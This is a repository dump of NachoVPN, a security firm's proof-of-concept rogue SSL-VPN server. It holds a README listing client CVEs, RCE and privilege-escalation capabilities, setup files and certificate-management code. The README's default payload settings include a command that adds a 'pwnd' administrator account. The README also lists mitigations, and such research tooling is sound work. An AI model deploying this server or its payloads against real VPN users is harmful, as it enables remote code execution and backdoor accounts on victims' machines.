Repository: AmberWolfCyber/NachoVPN Branch: main Commit: f1e891f8b1af Files: 72 Total size: 410.4 KB Directory structure: gitextract_izup__0x/ ├── .gitattributes ├── .github/ │ └── workflows/ │ └── build-docker.yml ├── .gitignore ├── Dockerfile ├── LICENSE ├── MANIFEST.in ├── README.md ├── docker-compose.yml ├── entrypoint.sh ├── requirements.txt ├── setup.py └── src/ └── nachovpn/ ├── __init__.py ├── core/ │ ├── __init__.py │ ├── cert_manager.py │ ├── db_manager.py │ ├── ip_manager.py │ ├── packet_handler.py │ ├── plugin_manager.py │ ├── request_handler.py │ ├── smb_manager.py │ └── utils.py ├── plugins/ │ ├── __init__.py │ ├── base/ │ │ ├── __init__.py │ │ ├── plugin.py │ │ └── templates/ │ │ └── 404.html │ ├── cisco/ │ │ ├── __init__.py │ │ ├── files/ │ │ │ ├── OnConnect.sh │ │ │ ├── OnConnect.vbs │ │ │ └── OnDisconnect.vbs │ │ ├── plugin.py │ │ └── templates/ │ │ ├── login.xml │ │ ├── prelogin.xml │ │ └── profile.xml │ ├── delinea/ │ │ ├── __init__.py │ │ ├── plugin.py │ │ └── templates/ │ │ ├── GetLauncherArguments.xml │ │ ├── GetNextProtocolHandlerVersion.xml │ │ ├── GetSymmetricKey.xml │ │ ├── UpdateStatusV2.xml │ │ └── index.html │ ├── example/ │ │ ├── __init__.py │ │ └── plugin.py │ ├── netskope/ │ │ ├── __init__.py │ │ ├── files/ │ │ │ └── STAgent.msi │ │ ├── plugin.py │ │ └── templates/ │ │ └── auth.html │ ├── paloalto/ │ │ ├── __init__.py │ │ ├── msi_downloader.py │ │ ├── msi_patcher.py │ │ ├── pkg_generator.py │ │ ├── plugin.py │ │ └── templates/ │ │ ├── getconfig.xml │ │ ├── prelogin.xml │ │ ├── pwresponse.xml │ │ ├── sslvpn-login.xml │ │ └── sslvpn-prelogin.xml │ ├── pulse/ │ │ ├── __init__.py │ │ ├── config_generator.py │ │ ├── config_parser.py │ │ ├── funk_parser.py │ │ ├── plugin.py │ │ └── test/ │ │ ├── example_rules.json │ │ └── test_policy.py │ └── sonicwall/ │ ├── __init__.py │ ├── files/ │ │ └── NACAgent.c │ ├── plugin.py │ └── templates/ │ ├── launchextender.html │ ├── launchplatform.html │ ├── logout.html │ ├── welcome.html │ └── 
wxacneg.html └── server.py ================================================ FILE CONTENTS ================================================ ================================================ FILE: .gitattributes ================================================ * text=auto *.sh text eol=lf ================================================ FILE: .github/workflows/build-docker.yml ================================================ name: Docker Build on: push: branches: ['release'] env: REGISTRY: ghcr.io IMAGE_NAME: ${{ github.repository }} jobs: build-and-push-image: runs-on: ubuntu-latest permissions: contents: read packages: write attestations: write id-token: write steps: - name: Checkout repository uses: actions/checkout@v4 - name: Log in to the Container registry uses: docker/login-action@65b78e6e13532edd9afa3aa52ac7964289d1a9c1 with: registry: ${{ env.REGISTRY }} username: ${{ github.actor }} password: ${{ secrets.GITHUB_TOKEN }} - name: Extract metadata (tags, labels) for Docker id: meta uses: docker/metadata-action@9ec57ed1fcdbf14dcef7dfbe97b2010124a938b7 with: images: ${{ env.REGISTRY }}/${{ env.IMAGE_NAME }} tags: | type=ref,event=branch type=raw,value=latest - name: Build and push Docker image id: push uses: docker/build-push-action@f2a1d5e99d037542a71f64918e516c093c6f3fc4 with: context: . 
push: true tags: ${{ steps.meta.outputs.tags }} labels: ${{ steps.meta.outputs.labels }} ================================================ FILE: .gitignore ================================================ # Ignore virtual environment directories env/ venv/ # Ignore environment files .env # Ignore compiled Python files *.pyc __pycache__/ # Ignore log files and debugging artifacts *.log # Ignore coverage reports .coverage .coverage.* htmlcov/ *.cover # Ignore cache files and directories *.egg-info/ .eggs/ *.egg *.pyo *.pyd *.pdb .cache/ *.pytest_cache/ *.zip # Ignore distribution files dist/ build/ *.whl # Ignore your specific directories certs/ downloads/ payloads/ pcaps/ # Ignore testing artifacts .tox/ .nox/ .pytest_cache/ # Ignore IDE/project-specific files .vscode/ .idea/ *.iml # Ignore database files *.sqlite3 *.db # Ignore temporary files *.tmp *.swp *.swo *.bak *.orig .DS_Store ================================================ FILE: Dockerfile ================================================ FROM ubuntu:jammy WORKDIR /app ENV PYTHONDONTWRITEBYTECODE=1 ENV PYTHONUNBUFFERED=1 RUN apt-get update && apt-get install -y --no-install-recommends \ gcc \ libffi-dev \ libssl-dev \ osslsigncode \ msitools \ mingw-w64 \ gcc-mingw-w64 \ python3 \ python3-pip \ python-is-python3 \ python3-nftables \ nftables \ && apt-get clean && rm -rf /var/lib/apt/lists/* COPY setup.py . COPY MANIFEST.in . COPY requirements.txt . COPY src/ src/ RUN pip install --no-cache-dir -r requirements.txt RUN pip install --no-cache-dir certbot RUN python setup.py sdist bdist_wheel RUN pip install --no-cache-dir dist/*.whl EXPOSE 80 EXPOSE 443 COPY entrypoint.sh . RUN chmod +x entrypoint.sh ENTRYPOINT ["/bin/bash", "-c", "./entrypoint.sh"] ================================================ FILE: LICENSE ================================================ MIT License Copyright (c) 2024 AmberWolf Ltd. 
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. ================================================ FILE: MANIFEST.in ================================================ recursive-include src/nachovpn/plugins **/templates/* recursive-include src/nachovpn/plugins **/files/* ================================================ FILE: README.md ================================================ # NachoVPN 🌮🔒

NachoVPN is a Proof of Concept that demonstrates exploitation of SSL-VPN clients, using a rogue VPN server. It uses a plugin-based architecture so that support for additional SSL-VPN products can be contributed by the community. It currently supports various popular corporate VPN products, such as Cisco AnyConnect, SonicWall NetExtender, Palo Alto GlobalProtect, and Ivanti Connect Secure. For further details, see our [blog post](https://blog.amberwolf.com/blog/2024/november/introducing-nachovpn---one-vpn-server-to-pwn-them-all/), and HackFest Hollywood 2024 presentation [[slides](https://github.com/AmberWolfCyber/presentations/blob/main/2024/Very%20Pwnable%20Networks%20-%20HackFest%20Hollywood%202024.pdf)|[video](https://www.youtube.com/watch?v=-MZfkmcZRVg)]. ## Installation ### Prerequisites * Python 3.9 or later * Docker (optional) * osslsigncode (Linux only) * msitools (Linux only) * python3-nftables (Linux only) * git ### Linux Setup NachoVPN is built and tested on Ubuntu 22.04. * Install `python3-nftables` and `nftables` * Optionally use `setcap` to avoid `sudo` requirement: ```bash sudo setcap 'cap_net_raw,cap_net_bind_service,cap_net_admin=eip' /usr/bin/python3.10 ``` * Enable IP forwarding: ```bash sudo sysctl -w net.ipv4.ip_forward=1 ``` ### Installing from source NachoVPN can be installed from GitHub using pip. Note that this requires git to be installed. First, create a virtual environment. 
On Linux, ensure that the virtual env has access to the system `site-packages`, so that `nftables` works: ```bash python3 -m venv env --system-site-packages source env/bin/activate ``` On Windows, nftables (and thus packet forwarding) is disabled, so use: ```bash python -m venv env .\env\Scripts\activate ``` Then, install NachoVPN: ```bash pip install git+https://github.com/AmberWolfCyber/NachoVPN.git ``` If you prefer to use Docker, then you can pull the container from the GitHub Container Registry: ```bash docker pull ghcr.io/AmberWolfCyber/nachovpn:release ``` ## Building for distribution ### Building a wheel file First, clone this repository, and install `setuptools` and `wheel` via pip. You can then run the `setup.py` script: ```bash git clone https://github.com/AmberWolfCyber/NachoVPN pip install -U setuptools wheel python setup.py bdist_wheel ``` This will generate a wheel file in the `dist` directory, which can be installed with pip: ```bash pip install dist/nachovpn-1.0.0-py3-none-any.whl ``` ### Building for local development Alternatively, for local development you can install the package in editable mode using: ```bash pip install -e . ``` ### Building a container image You can build the container image with the following command: ```bash docker build -t nachovpn:latest . ``` ## Running To run the server as standalone, use: ``` python -m nachovpn.server ``` Alternatively, you can run the server using Docker: ```bash docker run -e SERVER_FQDN=connect.nachovpn.local -e EXTERNAL_IP=1.2.3.4 -v ./certs:/app/certs -p 80:80 -p 443:443 --rm -it nachovpn ``` This will generate a certificate for the `SERVER_FQDN` using certbot, and save it to the `certs` directory, which we've mounted into the container. Alternatively, for testing purposes, you can skip the certificate generation by setting the `SKIP_CERTBOT` environment variable. This will generate a self-signed certificate instead. 
```bash docker run -e SERVER_FQDN=connect.nachovpn.local -e SKIP_CERTBOT=1 -e EXTERNAL_IP=1.2.3.4 -p 443:443 --rm -it nachovpn ``` An example [docker-compose file](docker-compose.yml) is also provided for convenience. ### Debugging You can run `nachovpn` with the `-d` or `--debug` command line arguments in order to increase the verbosity of logging, which can aid in debugging. Alternatively, if the logging is too noisy, you can use the `-q` or `--quiet` command line argument instead. ### Plugins NachoVPN supports the following plugins and capabilities: | Plugin | Product | CVE | Windows RCE | macOS RCE | Privileged | URI Handler | Packet Capture | Demo | | -------- | ----------- | -------- | -------- | -------- | -------- | -------- | -------- | ---- | | Cisco | Cisco AnyConnect | N/A | ✅ | ✅ | ❌ | ❌ | ✅ | [Windows](https://vimeo.com/1024773762) / [macOS](https://vimeo.com/1024773668) | | SonicWall | SonicWall NetExtender | [CVE-2024-29014](https://blog.amberwolf.com/blog/2024/november/sonicwall-netextender-for-windows---rce-as-system-via-epc-client-update-cve-2024-29014/) | ✅ | ❌ | ✅ | ✅ | ❌ | [Windows](https://vimeo.com/1024774407) | | PaloAlto | Palo Alto GlobalProtect | [CVE-2024-5921](https://blog.amberwolf.com/blog/2024/november/palo-alto-globalprotect---code-execution-and-privilege-escalation-via-malicious-vpn-server-cve-2024-5921/) [(partial fix)](https://blog.amberwolf.com/blog/2025/august/nachovpn-update---palo-alto-globalprotect/) | ✅ | ✅ | ✅ | ❌ | ✅ | [Windows](https://vimeo.com/1024774239) / [macOS](https://vimeo.com/1024773987) / [iOS](https://vimeo.com/1024773956) | | PulseSecure | Ivanti Connect Secure | [CVE-2020-8241 (bypassed)](https://blog.amberwolf.com/blog/2025/july/nachovpn-update---ivanti-connect-secure/) | ✅ | ✅ | ✅ | ✅ (Windows only - disabled by default in [22.8R1](https://help.ivanti.com/ps/help/en_US/ISAC/22.X/rn-22.X/noteworthy-information.htm)) | ✅ | [Windows](https://vimeo.com/1024773914) | | Netskope | Netskope | 
[CVE-2025-0309](https://blog.amberwolf.com/blog/2025/august/advisory---netskope-client-for-windows---local-privilege-escalation-via-rogue-server/) | ✅ | ❌ | ✅ | ❌ | ❌ | [Windows](https://vimeo.com/1114191607) | | Delinea | Protocol Handler | [CVE-2026-????](https://blog.amberwolf.com/blog/2026/february/delinea-protocol-handler---return-of-the-msi/) | ✅ | ✅ | ❌ | ✅ | ❌ | [Windows](https://vimeo.com/1168821295) | #### URI handlers * The Ivanti Connect Secure (Pulse Secure) URI handler can be triggered by visiting the `/pulse` URL on the NachoVPN server. * The SonicWall NetExtender URI handler can be triggered by visiting the `/sonicwall` URL on the NachoVPN server. This requires that the SonicWall Connect Agent is installed on the client machine. * The Delinea URI handler can be triggered by visiting the `/delinea` URL on the NachoVPN server. #### Operating Notes * It is recommended to use a TLS certificate that is signed by a trusted Certificate Authority. The docker container automates this process for you, using certbot. If you do not use a trusted certificate, then NachoVPN will generate a self-signed certificate instead, which in most cases will either cause the client to prompt with a certificate warning, or it will refuse to connect unless you modify the client settings to accept self-signed certificates. For the Palo Alto GlobalProtect plugin, this will also cause the MSI installer to fail. * In order to simulate a valid codesigning certificate for the SonicWall plugin, NachoVPN will sign the `NACAgent.exe` payload with a self-signed certificate. For testing purposes, you can download and install this CA certificate from `/sonicwall/ca.crt` before triggering the exploit. For production use-cases, you will need to obtain a valid codesigning certificate from a public CA, sign your `NACAgent.exe` payload, and place it in the `payloads` directory (or volume mount it into `/app/payloads`, if using docker). 
* For convenience, a default `NACAgent.exe` payload is generated for the SonicWall plugin, and written to the `payloads` directory. This simply spawns a new `cmd.exe` process on the current user's desktop, running as `SYSTEM`. * The Palo Alto GlobalProtect plugin requires that the MSI installers and `msi_version.txt` file are present in the `downloads` directory. Either add these manually, or run the `msi_downloader.py` script to download them. * To perform the Palo Alto GlobalProtect downgrade attack, ensure that the `GlobalProtect.msi.old` and `GlobalProtect64.msi.old` are present in the `downloads` folder. These files should contain the *unmodified* MSI installers for a version *prior* to 6.2.6 (e.g. 6.2.5). #### Disabling a plugin To disable a plugin, add it to the `DISABLED_PLUGINS` environment variable. For example: ```bash DISABLED_PLUGINS=CiscoPlugin,SonicWallPlugin ``` ### Environment Variables NachoVPN is configured using environment variables. This makes it easily compatible with containerised deployments. Global environment variables: | Variable | Description | Default | | -------- | ----------- | ------- | | `SERVER_FQDN` | The fully qualified domain name of the server. | `connect.nachovpn.local` | | `EXTERNAL_IP` | The external IP address of the server. | `127.0.0.1` | | `WRITE_PCAP` | Whether to write captured PCAP files to disk. | `false` | | `DISABLED_PLUGINS` | A comma-separated list of plugins to disable. | | | `USE_DYNAMIC_SERVER_THUMBPRINT` | Whether to calculate the server certificate thumbprint dynamically from the server (useful if behind a proxy). | `false` | | `SERVER_SHA1_THUMBPRINT` | Allows overriding the calculated SHA1 thumbprint for the server certificate. | | | `SERVER_MD5_THUMBPRINT` | Allows overriding the calculated MD5 thumbprint for the server certificate. 
| | | `SMB_ENABLED` | Enables the SMB share, available via the tunnel at `\\10.10.0.1\` | `false` | | `SMB_SHARE_NAME` | The name to use for the SMB share | `SHARE` | | `SMB_SHARE_PATH` | The path to the directory to use for the SMB share | `smb` | | `TUNNEL_PRIVATE` | When set to `true`, enables tunneling but disables internet forwarding for VPN clients. Clients can only access the SMB share. | `false` | | `TUNNEL_FULL` | When set to `true`, enables full tunneling and allows VPN clients to access the internet. Also implies `TUNNEL_PRIVATE=true`. | `false` | Plugin specific environment variables: | Variable | Description | Default | | -------- | ----------- | ------- | | `VPN_NAME` | The name of the VPN profile, which is presented to the client for Cisco AnyConnect. | `NachoVPN` | | `PULSE_LOGON_SCRIPT` | The path to the Pulse Secure logon script. | `C:\Windows\System32\calc.exe` | | `PULSE_LOGON_SCRIPT_MACOS` | The path to the Pulse Secure logon script for macOS. | | | `PULSE_DNS_SUFFIX` | The DNS suffix to be used for Pulse Secure connections. | `nachovpn.local` | | `PULSE_USERNAME` | The username to be pre-filled in the Pulse Secure logon dialog. | | | `PULSE_SAVE_CONNECTION` | Whether to save the Pulse Secure connection in the user's client. | `false` | | `PULSE_ANONYMOUS_AUTH` | Whether to use anonymous authentication for Pulse Secure connections. If set to `true`, the user will not be prompted for a username or password. | `false` | | `PULSE_HOST_CHECKER_RULES_FILE` | A JSON file containing a list of registry-based host-checker rules for ICS. See example in `src/nachovpn/plugins/pulse/test/example_rules.json` | | | `PALO_ALTO_MSI_ADD_FILE` | The path to a file to be added to the Palo Alto installer MSI. | | | `PALO_ALTO_MSI_COMMAND` | The command to be executed by the Palo Alto installer MSI. | `net user pwnd Passw0rd123! 
/add && net localgroup administrators pwnd /add` | | `PALO_ALTO_FORCE_PATCH` | Whether to force the patching of the MSI installer if it already exists in the payloads directory. | `false` | | `PALO_ALTO_PKG_COMMAND` | The command to be executed by the Palo Alto installer PKG on macOS. | `touch /tmp/pwnd` | | `CISCO_COMMAND_WIN` | The command to be executed by the Cisco AnyConnect OnConnect.vbs script on Windows. | `calc.exe` | | `CISCO_COMMAND_MACOS` | The command to be executed by the Cisco AnyConnect OnConnect.sh script on macOS. | `touch /tmp/pwnd` | ## Mitigations We recommend the following mitigations: * Ensure SSL-VPN clients are updated to the latest version available from the vendor. * Most VPN clients support the concept of locking down the VPN profile to a specific endpoint, or using an always-on VPN mode. This should be enabled where possible. * Unfortunately, in some cases this lockdown can be removed by a malicious local user, therefore it is also recommended to use host-based firewall rules to restrict the IP addresses that the VPN client can communicate with. * Consider using an Application Control policy, such as WDAC, or an EDR solution to ensure that only approved executables and scripts can be executed by the VPN client. * Detect and alert on VPN clients executing non-standard child processes. 
## References * [AmberWolf Blog: NachoVPN](https://blog.amberwolf.com/blog/2024/november/introducing-nachovpn---one-vpn-server-to-pwn-them-all/) * [HackFest Hollywood 2024: Very Pwnable Networks: Exploiting the Top Corporate VPN Clients for Remote Root and SYSTEM Shells, Rich Warren & David Cash](https://github.com/AmberWolfCyber/presentations/blob/main/2024/Very%20Pwnable%20Networks%20-%20HackFest%20Hollywood%202024.pdf) [[video](https://www.youtube.com/watch?v=-MZfkmcZRVg)] * [BlackHat 2008: Leveraging the Edge: Abusing SSL VPNs, Mike Zusman](https://www.blackhat.com/presentations/bh-usa-08/Zusman/BH_US_08_Zusman_SSL_VPN_Abuse.pdf) * [BlackHat 2019: Infiltrating Corporate Intranet Like NSA, Orange Tsai & Meh Chang](https://i.blackhat.com/USA-19/Wednesday/us-19-Tsai-Infiltrating-Corporate-Intranet-Like-NSA.pdf) * [NCC Group: Making New Connections: Leveraging Cisco AnyConnect Client to Drop and Run Payloads, David Cash & Julian Storr](https://www.nccgroup.com/uk/research-blog/making-new-connections-leveraging-cisco-anyconnect-client-to-drop-and-run-payloads/) * [The OpenConnect Project](https://www.infradead.org/openconnect/) ## Contributing We welcome contributions! Please open an issue or raise a Pull Request. If you're interested in developing a new plugin, you can take a look at the [ExamplePlugin](src/nachovpn/plugins/example/plugin.py) to get started. ## License NachoVPN is licensed under the MIT license. See the [LICENSE](LICENSE) file for details. ================================================ FILE: docker-compose.yml ================================================ services: nachovpn: container_name: nachovpn build: context: . 
dockerfile: Dockerfile restart: unless-stopped ports: - "443:443" - "80:80" volumes: - ./certs/:/app/certs/ - ./payloads/:/app/payloads/ - ./downloads/:/app/downloads/ environment: - SERVER_FQDN=${SERVER_FQDN:-} - EXTERNAL_IP=${EXTERNAL_IP:-} - SKIP_CERTBOT=${SKIP_CERTBOT:-} networks: - backend networks: backend: ================================================ FILE: entrypoint.sh ================================================ #!/bin/bash #if [[ -z "${SERVER_FQDN}" ]]; then # echo "Error: SERVER_FQDN is not set or is empty" # exit 1 #fi #if [[ -z "${EXTERNAL_IP}" ]]; then # echo "Error: EXTERNAL_IP is not set or is empty" # exit 1 #fi CERT_PATH="/app/certs/server-dns.crt" KEY_PATH="/app/certs/server-dns.key" if [[ -n "${SKIP_CERTBOT}" ]]; then echo "SKIP_CERTBOT is set. Skipping Certbot execution." elif [[ -n "${WEBSITE_HOSTNAME}" ]]; then echo "WEBSITE_HOSTNAME is set. Skipping Certbot execution." elif [[ -f "$CERT_PATH" && -f "$KEY_PATH" ]]; then echo "Certificate and key already exist. Skipping Certbot execution." else # Request a certificate from letsencrypt certbot certonly \ --standalone \ --preferred-challenges http-01 \ --register-unsafely-without-email \ --agree-tos \ --non-interactive \ --no-eff-email \ --domain "$SERVER_FQDN" if [[ $? -eq 0 ]]; then echo "Certificate successfully generated." # Copy the certs cp "/etc/letsencrypt/live/$SERVER_FQDN/fullchain.pem" "$CERT_PATH" cp "/etc/letsencrypt/live/$SERVER_FQDN/privkey.pem" "$KEY_PATH" echo "Certificate and key copied to:" echo " Certificate: $CERT_PATH" echo " Key: $KEY_PATH" else echo "Certbot failed to generate the certificate." 
exit 2 fi fi # Build CLI arguments CLI_ARGS="" # Check for SERVER_PORT or WEBSITE_HOSTNAME (implies port 80) if [[ -n "${SERVER_PORT}" ]]; then CLI_ARGS="$CLI_ARGS --port $SERVER_PORT" elif [[ -n "${WEBSITE_HOSTNAME}" ]]; then CLI_ARGS="$CLI_ARGS --port 80" fi # Check for DISABLE_TLS or WEBSITE_HOSTNAME (implies no TLS) if [[ -n "${DISABLE_TLS}" || -n "${WEBSITE_HOSTNAME}" ]]; then CLI_ARGS="$CLI_ARGS --no-tls" fi echo "Starting nachovpn server with arguments: $CLI_ARGS" exec python -m nachovpn.server $CLI_ARGS ================================================ FILE: requirements.txt ================================================ blinker==1.7.0 certifi>=2024.2.2 cffi==1.16.0 charset-normalizer==3.3.2 click==8.1.7 colorama==0.4.6 cryptography==42.0.5 Flask==3.0.2 idna==3.6 itsdangerous==2.1.2 Jinja2==3.1.3 MarkupSafe==2.1.5 pycparser==2.21 requests==2.31.0 urllib3==2.2.1 Werkzeug==3.0.1 scapy==2.5.0 pycryptodome==3.20.0 pem==23.1.0 cabarchive==0.2.4 PyJWT==2.10.1 pyroute2==0.9.2 impacket==0.12.0 ================================================ FILE: setup.py ================================================ from setuptools import setup, find_packages setup( name="nachovpn", version="1.0.0", package_dir={"": "src"}, packages=find_packages(where="src"), include_package_data=True, install_requires=[ "cryptography==42.0.5", "jinja2>=3.0.0", "scapy>=2.5.0", "requests>=2.31.0", "flask>=3.0.2", "cabarchive>=0.2.4", "pycryptodome>=3.20.0", "PyJWT>=2.10.1", "pyroute2>=0.9.2", ], python_requires=">=3.9", description="A delicious, but malicious SSL-VPN server", entry_points={ "console_scripts": [ "nachovpn=nachovpn.server:main", ], }, ) ================================================ FILE: src/nachovpn/__init__.py ================================================ ================================================ FILE: src/nachovpn/core/__init__.py ================================================ ================================================ FILE: 
src/nachovpn/core/cert_manager.py ================================================ from cryptography import x509 from cryptography.x509.oid import NameOID, ExtendedKeyUsageOID, ObjectIdentifier from cryptography.hazmat.backends import default_backend from cryptography.hazmat.primitives import hashes, serialization from cryptography.hazmat.primitives.asymmetric import rsa, ec, padding import logging import datetime import hashlib import ipaddress import socket import certifi import ssl import os class CertManager: def __init__(self, cert_dir=os.path.join(os.getcwd(), 'certs'), ca_common_name="VPN Root CA"): self.cert_dir = cert_dir os.makedirs(cert_dir, exist_ok=True) self.ca_common_name = ca_common_name self.server_thumbprint = {} self.dns_name = os.getenv('SERVER_FQDN', socket.gethostname()) self.ip_address = os.getenv('EXTERNAL_IP', socket.gethostbyname(socket.gethostname())) def setup(self): """Setup the certificates and load the SSL context""" self.load_ca_certificate() self.load_dns_certificate() self.load_ip_certificate() self.create_ssl_context() # server thumbprint is a dictionary with sha1 and md5 hashes of the DNS cert self.server_thumbprint = self.get_cert_thumbprint(self.dns_cert_path) def create_ssl_context(self): """Create SSL context with SNI support and proper TLS configuration""" self.ssl_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER) def sni_callback(sslsocket, sni_name, sslcontext): try: if not sni_name: sslsocket.context = self.ssl_context return None logging.debug(f"SNI hostname requested: {sni_name}") # Create a new context for this connection ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER) if sni_name == self.dns_name: ctx.load_cert_chain(self.dns_cert_path, self.dns_key_path) else: ctx.load_cert_chain(self.ip_cert_path, self.ip_key_path) # Set the new context sslsocket.context = ctx except Exception as e: logging.error(f"Error in SNI callback: {e}") return None # Set the SNI callback self.ssl_context.sni_callback = sni_callback # Load 
default certificate (IP cert) self.ssl_context.load_cert_chain( certfile=self.ip_cert_path, keyfile=self.ip_key_path ) return self.ssl_context def load_ip_certificate(self): """Load or generate a certificate for the server's external IP address""" self.ip_cert_path = os.path.join(self.cert_dir, f"server-ip.crt") self.ip_key_path = os.path.join(self.cert_dir, f"server-ip.key") if os.path.exists(self.ip_cert_path) and os.path.exists(self.ip_key_path) \ and self.cert_is_valid(self.ip_cert_path, self.ip_address): logging.info(f"Using existing certificate for: {self.ip_address}") return self.ip_cert_path, self.ip_key_path else: logging.info(f"Generating new certificate for: {self.ip_address}") return self.generate_server_certificate(self.ip_cert_path, self.ip_key_path, self.ip_address, additional_ekus=[ObjectIdentifier('1.3.6.1.5.5.7.3.5')], additional_sans=[x509.IPAddress(ipaddress.IPv4Address(self.ip_address)), x509.DNSName(self.dns_name)]) def load_dns_certificate(self): """Load or generate a certificate for the server's DNS name""" # this certificate may be volume mounted (e.g. 
when using certbot outside of the container) self.dns_cert_path = os.path.join(self.cert_dir, f"server-dns.crt") self.dns_key_path = os.path.join(self.cert_dir, f"server-dns.key") if os.path.exists(self.dns_cert_path) and os.path.exists(self.dns_key_path) \ and self.cert_is_valid(self.dns_cert_path, self.dns_name): logging.info(f"Using existing certificate for: {self.dns_name}") return self.dns_cert_path, self.dns_key_path else: logging.info(f"Generating new certificate for: {self.dns_name}") return self.generate_server_certificate(self.dns_cert_path, self.dns_key_path, self.dns_name, additional_sans=[x509.DNSName(self.dns_name)]) def load_ca_certificate(self): """Load or generate the CA certificate""" self.ca_cert_path = os.path.join(self.cert_dir, 'ca.crt') self.ca_key_path = os.path.join(self.cert_dir, 'ca.key') if os.path.exists(self.ca_cert_path) and os.path.exists(self.ca_key_path): with open(self.ca_cert_path, 'rb') as f: self.ca_cert = x509.load_pem_x509_certificate(f.read(), default_backend()) with open(self.ca_key_path, 'rb') as f: self.ca_key = serialization.load_pem_private_key(f.read(), password=None, backend=default_backend()) return self.ca_cert_path, self.ca_key_path else: return self.generate_ca_certificate() def cert_is_valid(self, cert_path, common_name): """Check if the certificate is valid""" # skip certificate validation if we're overriding the thumbprint or retrieving it dynamically from the server # this allows us to keep serving our origin certificate while advertising the proxy thumbprint # this is needed for certain proxies which require the origin has a valid certificate # if we didn't do this, the cert manager would detect a mismatch and re-generate the certificate if os.getenv('USE_DYNAMIC_SERVER_THUMBPRINT', 'false').lower() == 'true' or \ os.getenv('SERVER_SHA1_THUMBPRINT', '') != '' or \ os.getenv('SERVER_MD5_THUMBPRINT', '') != '': return True with open(cert_path, 'rb') as f: cert = x509.load_pem_x509_certificate(f.read(), 
default_backend()) date_valid = (cert.not_valid_before_utc \ <= datetime.datetime.now(datetime.timezone.utc) \ <= cert.not_valid_after_utc) if not date_valid: logging.error(f"Certificate for {common_name} is expired") return False cert_common_name = cert.subject.get_attributes_for_oid(NameOID.COMMON_NAME)[0].value name_valid = cert_common_name == common_name if not name_valid: logging.error(f"Certificate for {cert_common_name} is not valid for {common_name}") return False # check if the issuer Common Name matches our self-signed CA # if the issuer name matches, but the cert is not validly signed by the current CA, return False # this helps to identify stale certificates when the CA certificate has been re-generated if cert.issuer.get_attributes_for_oid(NameOID.COMMON_NAME)[0].value == self.ca_common_name: try: self.ca_cert.public_key().verify( cert.signature, cert.tbs_certificate_bytes, padding.PKCS1v15(), cert.signature_hash_algorithm, ) logging.info(f"Certificate is validly signed by our CA. Will not re-generate.") except Exception as e: logging.warning(f"Certificate is not validly signed by the current CA: {e}. Will re-generate.") return False else: # if the cert wasn't issued by our CA, then it's probably been signed by a public CA, # such as Let's Encrypt, and we should not re-generate it. # TODO: we may wish to check that the cert chains to a trusted root CA in the future, # but it doesn't really matter for our use case logging.warning(f"Certificate was not issued by our CA. 
Will not re-generate.")
                return True
        return True

    def get_thumbprint_from_server(self, server_address):
        """Get the certificate thumbprint from a server.

        Connects to ``server_address`` on TCP 443, performs a TLS handshake
        and hashes the peer's DER-encoded certificate.

        Returns a dict {'sha1': ..., 'md5': ...} of upper-case hex digests,
        or None on any connection/TLS error.
        """
        try:
            context = ssl.create_default_context()
            with socket.create_connection((server_address, 443), timeout=5) as sock:
                with context.wrap_socket(sock, server_hostname=server_address) as wrapped_sock:
                    der_cert = wrapped_sock.getpeercert(binary_form=True)
                    # MD5 is cryptographically broken; it is computed here only as a
                    # fingerprint alongside SHA-1 — presumably for clients that expect
                    # an MD5 thumbprint. TODO confirm against plugin callers.
                    thumbprint_sha1 = hashlib.sha1(der_cert).hexdigest().upper()
                    thumbprint_md5 = hashlib.md5(der_cert).hexdigest().upper()
                    return {'sha1': thumbprint_sha1, 'md5': thumbprint_md5}
        except (socket.timeout, ssl.SSLError, ssl.CertificateError, OSError) as e:
            logging.error(f"Error getting thumbprint from server {server_address}: {e}")
            return None

    def get_cert_thumbprint(self, cert_path):
        """Calculate the certificate thumbprint.

        Loads the PEM certificate at ``cert_path`` and returns a dict
        {'sha1': ..., 'md5': ...} of upper-case hex digests of its DER bytes.
        """
        with open(cert_path, 'rb') as f:
            cert = x509.load_pem_x509_certificate(f.read(), default_backend())
        der_cert = cert.public_bytes(serialization.Encoding.DER)
        thumbprint_sha1 = hashlib.sha1(der_cert).hexdigest().upper()
        thumbprint_md5 = hashlib.md5(der_cert).hexdigest().upper()
        # allow overriding the thumbprint for fronting scenarios
        # (e.g. when a reverse proxy/CDN in front of us terminates TLS with
        # a different certificate than the local one on disk)
        thumbprint_sha1 = os.getenv('SERVER_SHA1_THUMBPRINT', thumbprint_sha1)
        thumbprint_md5 = os.getenv('SERVER_MD5_THUMBPRINT', thumbprint_md5)
        return {'sha1': thumbprint_sha1, 'md5': thumbprint_md5}

    # NOTE(review): additional_ekus=[] / additional_sans=[] are mutable default
    # arguments — shared across calls if ever mutated. Safer would be None
    # defaults; left as-is here since callers may rely on the current signature.
    def generate_server_certificate(self, cert_path, key_path, common_name="*", additional_ekus=[], additional_sans=[]):
        """Generate a server certificate signed by the managed CA.

        Writes the leaf cert (with the CA cert appended, i.e. a chain) to
        ``cert_path`` and the unencrypted private key to ``key_path``.
        Returns (cert_path, key_path).
        """
        # Get CA cert
        if not self.ca_cert or not self.ca_key:
            self.load_ca_certificate()

        # Generate server private key
        cert_key = rsa.generate_private_key(
            public_exponent=65537,
            key_size=2048,
            backend=default_backend()
        )

        # Build server certificate signed by CA
        subject = x509.Name([
            x509.NameAttribute(NameOID.COMMON_NAME, common_name),
        ])

        # list of SANs
        san_list = additional_sans

        # list of EKUs
        eku_list = [
            ExtendedKeyUsageOID.SERVER_AUTH,
            ExtendedKeyUsageOID.CLIENT_AUTH,
        ] + additional_ekus

